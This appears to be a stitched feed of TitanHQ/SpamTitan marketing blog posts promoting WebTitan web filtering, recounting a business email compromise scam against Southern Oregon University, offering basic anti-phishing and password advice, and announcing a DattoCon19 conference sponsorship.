Comparing the before and after results will let you see the advantages of your program and could be used to help get more funding.
Train your staff constantly and review their understanding, and in a relatively short space of time you can create a highly effective human firewall that complements your technological cyber security measures. If a malicious email breaks through your spam filter, you can be confident that your employees will have the skills to recognize the threat.
An enterprise web filtering solution must provide a robust defense against web-borne threats along with being flexible in order to meet the requirements of the enterprise. However, flexibility without ease-of-use can result in the solution being useless. If enterprise web filtering software is difficult to configure, filtering parameters may either be set too high – obstructing workflows – or set too low, allowing a gateway for hackers.
At SpamTitan, we are conscious of the possible issues related to enterprise web filtering, and we have developed a range of flexible and easy-to-use enterprise Internet filtering solutions that can be set up in minutes, that have no upfront costs, and that have low maintenance overheads – releasing IT resources to focus on other important problems. We also provide guidance on how to optimize filtering parameters.
In order to maximize the flexibility of our enterprise web filtering software, we deploy a three-tier filtering mechanism and whitelists to allow access to websites that may otherwise be restricted and to reduce the strain on CPU resources when the solution is reviewing encrypted websites. The three tiers consist of URIBL/SURBL filters, category filters and keyword filters:
URIBL/SURBL filters check requests to visit websites against blacklists of websites known to be harboring malware or that mask their true identities behind proxy servers. They also check for any IP addresses associated with phishing attacks and block access if a match is discovered.
Our category filters sort more than six billion web pages into fifty-three different categories (abortion, adult entertainment, alternative beliefs, alcohol, etc.). Network Administrators can block access to any of the categories with the click of a mouse via the centralized management portal.
Keyword filters restrict access to websites containing specific words, using specific apps, or inviting installations with specific file extensions. This third tier of our enterprise web filtering software supplies a high level of granularity to prevent workflow obstruction or gateways for hackers.
All the filtering parameters are subject to user policies, which can be established and managed by individual user, user group or enterprise-wide. For ease of use, our enterprise Internet filtering solution can be integrated with Active Directory and LDAP, and allows for many different administrative roles to be created for network managers, policy managers, and reporting managers.
SpamTitan’s variety of flexible and simple-to-use enterprise Internet filtering solutions consist of WebTitan Gateway, WebTitan Cloud, and WebTitan Cloud for WiFi. Each can be deployed within minutes and each has automatic network configuration.
WebTitan Gateway is a virtual appliance that is downloaded behind the firewall and can be run as an ISO directly on existing hardware or a virtual infrastructure. It can be used on most operating systems, is scalable to thousands of users, and supports both HTTP and HTTPS web filtering.
WebTitan Cloud takes advantage of cloud-based technology to deliver an unmatched combination of coverage, accuracy and flexibility with imperceptible latency. Deployment only needs a quick redirection of the enterprise's DNS to our servers.
WebTitan Cloud for WiFi has been specifically created to support both static and dynamic IP addresses. It keeps wireless networks, single WiFi access points and nationwide networks of WiFi hotspots safe from web-borne threats with the same flexibility and ease of use.
All of our enterprise Internet filtering solutions provide real-time oversight of network web activity and a suite of reporting options that can be set up to provide deep insight into activity by user, user group, URL or IP address and identify trends or policy violations. Network Administrators can also set up email alerts to notify them of any attempts to circumvent the enterprise web filtering software.
If your interest in enterprise Internet filtering solutions is a result of you being a Managed Service Provider (MSP) or reseller, you will appreciate that flexibility and ease-of-use are of paramount importance when supplying an enterprise Internet filtering service to clients. The option of managing the solution yourself, or delegating responsibility to each of your clients, may also be of interest to you.
However, some of the biggest benefits of providing our WebTitan service to your clients are that all three WebTitan solutions are multi-tenanted enterprise Internet filtering solutions, they can be provided in white label format for re-branding, and we offer a range of hosting options – in our infrastructure, in your infrastructure, or in a private cloud for each client via AWS. Please speak with us for more information about our services for MSPs.
If you would like to discover more about our flexible enterprise web filtering software, do not hesitate to contact us and talk about your requirements with one of our Sales Technicians. The discussion will help decide the most appropriate enterprise Internet filtering solution for your circumstances, after which you will be invited to take advantage of a thirty-day free trial.
During the trial period, you will be supported by our industry-leading Customer and Technical Support experts. They will provide advice about optimizing the filtering parameters, and take you through fine-tuning the enterprise web filtering software to achieve optimum effectiveness. Then, at the end of the free trial, if you choose to continue with our service, no further configuration will be necessary.
We are confident that you will find our enterprise web filtering software a strong defense against web-borne threats, flexible and easy-to-use. Contact us today to begin your free trial and you could be evaluating the merits of our enterprise Internet filtering solutions in your own environment quickly.
In too many cases, news of data breaches comes with details of the failures in network security that allowed a hacker access to confidential data. Many of these failures are preventable with adequate precautions such as a spam email filter and a mechanism for managing access to the Internet.
Almost as many breaches in network security can be blamed on poor employee training. Password sharing, unauthorized installations and poor online security practices can result in hackers gaining easy access to a network and extracting confidential data when they wish to.
It has been well reported that hackers will bypass groups with strong network security and turn their attention to fish that are simpler to catch. Make sure your group does not get caught in the net – set up appropriate web filters and educate your staff on the importance of network security.
A Southern Oregon University phishing attack has demonstrated exactly why so many hackers have opted for phishing as their main source of profits.
The Southern Oregon University phishing attack involved just one phishing email. The attackers pretended to be a construction company – Andersen Construction – that was erecting a pavilion and student recreation center at the University.
The attackers spoofed the email address of the construction firm and asked that all future payments be directed to a separate bank account. The university then transferred the next payment of €1.9m to the new account in April.
The university saw that the construction firm had not received the funds three days later. The FBI was made aware of the situation as soon as the fraud was discovered and efforts are continuing to recover the funds. The university reports that the hackers have not withdrawn all of the funds from their account, although a sizeable chunk cannot be located. Joe Mosley, a representative for SOU said, “It’s certainly not all of the money that was transferred, but it’s not just nickels and dimes, either.”
In order for a scam like this to be successful, the hackers would need to be aware that the construction project was taking place and know the name of the firm. Such data is not hard to find and universities often have construction projects under way.
These attacks are referred to as Business Email Compromise (BEC) scams. They typically involve a contractor’s email account being hacked and used to send an email to a vendor. It is not known whether the vendor’s email account had been hacked, but that step may not be necessary to pull off a phishing attack such as this.
Increase in BEC Attacks Prompts FBI Alert for Universities
In this instance, the payment was massive but it is far from an isolated incident. Last month, the FBI published a public service announcement warning universities of attacks such as this.
The FBI warned that access to a construction firm’s email account is not required. All that is required is for the scammer to buy a similar domain to the one used by the firm. Accounts department employees may check the email address and not notice that a letter has been changed.
By the time the university sees that a payment has not been sent, the funds have already been removed from the scammer’s account and cannot be recovered. Payments are often of the order of several hundred thousand dollars.
The FBI advised SOU that there have been 78 such attacks in the past 12 months, some of which have been carried out on universities. However, all groups are in danger from these BEC scams.
The Southern Oregon University phishing attack shows just how simple it can be for cybercriminals to pull off a BEC attack. Securing against this type of scam requires employees to be vigilant and to use extreme caution when requests are made to alter bank accounts. Such a request should always be verified by some means other than email. A telephone call to the construction firm could easily have prevented this scam before any transfer was completed.
Despite the high profile given to Internet privacy on mainstream media, there still appears to be naivety among certain Internet users about keeping their personal details safe. Thousands of data breaches impacting millions of people are reported every year, yet one still comes across the same stories about Internet users having the same passwords for a range of different sites.
Whether a password is in place for a social media account, an online shopping site or an online banking portal, it should be a) unique, b) hard to guess, and c) changed often. To manage your Internet privacy, only ever give the minimum amount of information required and only if you have complete confidence in the website you are giving it to.
Social media can be a key factor of a group’s marketing operations – it can also be the gateway for many online threats. Internet users who choose not to use unique passwords for their online activities, share their passwords, or willingly provide confidential information without due consideration for the security implications can be risking the online security of an entire group.
Rather than let an employee threaten the integrity of your group’s online security, it is in your best interests to implement an Internet filtering solution from TitanHQ. An Internet filtering solution – and proper training about the risks of communicating confidential data online – can address the risk of your organization's online defenses being compromised by a staff member’s carelessness or naivety.
Phishing and email spam is thought to cost businesses over $1 billion each year, and hackers are becoming more complex in the campaigns they launch to try to steal confidential data or passwords from innocent Internet users.
Part of the reason why phishing and email spam still work is the language used within the communication. The message to “Act Now” because an account seems to have been impacted, or because a colleague seems to need urgent support, often causes people to act before they think.
Even experienced security consultants have been caught by phishing and email spam, and the advice provided to every Internet user is:
If you do not know whether an email request is legitimate, try to verify it by contacting the sender independently of the information given in the email.
Never hand over confidential data or passwords requested in an email or on a web page you have arrived at after clicking on a link in an email.
Turn on spam filters on your email, keep your anti-virus software up-to-date and turn on two-step authentication on all your accounts whenever you can.
Always use different passwords for separate accounts, and change them frequently to avoid becoming a victim of keylogging malware downloads.
Remember that phishing and email spam is not restricted to email. Watch out for scams sent through social media channels.
Phishing in particular has become a popular attack vector for hackers. Although phishing goes back to the first days of AOL, there has been a tenfold increase in phishing campaigns over the past 10 years reported to the Anti-Phishing Working Group (APWG).
Phishing is an extension of spam mail and can focus on small groups of people (spear phishing) or target executive-level management (whale phishing) in order to gather data or obtain access to computer systems.
The best way to safeguard yourself from phishing and email spam is to use the advice provided above and – most importantly – enable a reputable spam filter to block possibly unsafe emails from being sent to your inbox.
The main focus of our spam advice section is to keep you informed with the latest news on new email spam campaigns, email-based threats and anti-spam solutions that can be deployed to prevent those threats.
Email spam is more than an annoyance. Even if the amount of spam emails received by employees is relatively small, it can be a major drain on productivity, especially for groups with hundreds or thousands of employees. This section includes articles offering advice on how to reclaim those lost hours by cutting the number of messages that are delivered to your employees’ inboxes.
However, much worse than the lost hours are the malware and ransomware threats that arrive through spam email. Email is now the number one attack vector used by hackers to deliver malware and ransomware. Hackers are now using increasingly sophisticated methods to get around security solutions. Today’s spam emails use advanced social engineering tactics to trick end users into revealing login details and other sensitive information, and installing malicious software on their computers.
Major advances have also been made to malware and ransomware. Self-replicating worms are being used to infiltrate entire networks before ransomware attacks take place, maximizing the damage caused and the ransom payments that can be generated. The cost to industry is significant. In 2018 ransomware attacks resulted in $1 billion in losses by companies, with 2017 expected to see those losses increase to a staggering $4 billion. Blocking spam email messages from being sent is therefore an essential element of any cybersecurity policy.
Good spam advice can help groups take action promptly to reduce the danger of email-based attacks.
TitanHQ is excited to announce it will be a sponsor of the upcoming DattoCon19 MSP conference in San Diego on June 17-19.
The three-day conference is the premier event for managed service providers in the United States. Industry-leading MSPs, industry experts, and vendors will be holding sessions where MSPs can gain valuable insights into the business, learn best practices for maximizing profits and boosting sales growth, and discover the myriad of opportunities to boost monthly recurring revenue (MRR). Training will be offered on Datto solutions and vendors will be on hand to answer questions and solve MSP problems.
The focus on improving business growth and profitability, the learning sessions, and the networking opportunities greatly benefit MSPs. On average, DattoCon attendees achieve an increase of 41% year-over-year growth in MRR compared to those that failed to attend the conference.
TitanHQ will be on hand to provide MSPs with information on three cloud-based MSP solutions:
DattoCon19 attendees are encouraged to visit TitanHQ at booth 23 at the conference to:
Learn about TitanShield, TitanHQ’s exclusive partner program for MSPs
Find out about the TitanHQ technology that provides the web security layer for Datto D200 and DNA boxes
Discover TitanHQ solutions for MSPs
SpamTitan Cloud – Spam filter offering phishing and malware protection
WebTitan Cloud – DNS Filter for content control and protection from web-based attacks
ArcTitan – Email archiving for compliance
Find out how to better protect Office 365 from email-based attacks
Discover the considerable benefits of switching from Cisco Umbrella to WebTitan
Benefit from DattoCon19 show pricing
TitanHQ will also be running a daily raffle to win a bottle of vintage Irish whiskey and will be co-hosting two parties at DattoCon19: GasLamp District Takeovers on Monday 6/17 and Wednesday 6/19.
Rocco Donnino, Executive Vice President-Strategic Alliances, TitanHQ will be a panel member at the Datto Select Avendors!! Event on Monday June 17, between 3PM and 5PM.
This new event aims to solve some of the most pressing MSP problems with a panel of experts on hand to offer potential solutions.
TitanHQ Vintage Whiskey Raffle Winners
DattoCon19 will be taking place in San Diego, California on June 17-19, 2019
If you are not yet registered for the event you can do so here.